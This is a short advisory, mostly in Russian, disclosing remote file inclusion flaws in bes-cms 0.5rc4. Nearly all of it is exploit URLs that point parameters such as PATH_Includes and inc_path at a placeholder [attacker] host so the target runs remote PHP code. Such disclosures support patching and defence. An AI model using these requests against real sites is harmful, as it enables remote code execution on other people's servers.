Программа: bes-cms 0.5rc4
Уязвимость включения файлов обнаружена в
bes-cms. Удаленный пользователь может выполнить произвольные команды на целевой системе.
Уязвимость включения файлов обнаружена в нескольких сценариях
(index.inc.php, Members/index.inc.php, Members/root/index.inc.php, Include/functions_folder.php
file, Include/functions_hacking.php, Include/functions_message.php, и Include/Start.php). В результате удаленный атакующий может выполнить произвольный PHP код на уязвимой системе.
Пример:
Including of file : (if register_globals=ON):
http://[target]/index.inc.php?PATH_Includes=http://[attacker]/
http://[target]/Members/index.inc.php? PATH_Includes=http://[attacker]/
http://[target]/Members/root/index.inc.php? PATH_Includes=http://[attacker]/
Could include the file : http://[attacker]/actions_default.php
http://[target]/Include/functions_folder.php?PATH_Includes= http://[attacker]/
Could include the files : http://[attacker]/functions_folder_modules.php
http://[attacker]/functions_folder_plugins.php
http://[attacker]/functions_folder_files.php
http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=usershow
http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=logger
Could include the file : http://[attacker]/functions_user.php
http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=send_bug&UserDetails
[LOGGED_IN]=YES
Could include the file : http://[attacker]/functions_error.php
http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=content_view
Could include the file : http://[attacker]/functions_message_docTypes.php
http://[target]/Include/functions_hacking.php?PATH_Includes= http://[attacker]/&itemID=search
Could include the file : http://[attacker]/functions_general.php
http://[target]/Include/functions_message.php?PATH_Includes= http://[attacker]/
Could include the files : http://[attacker]/functions_message_docTypes.php
http://[attacker]/functions_message_edit.php
http://[target]/Include/Start.php?inc_path=http://[attacker]/
Could include the file : http://[attacker]/Include/vars.php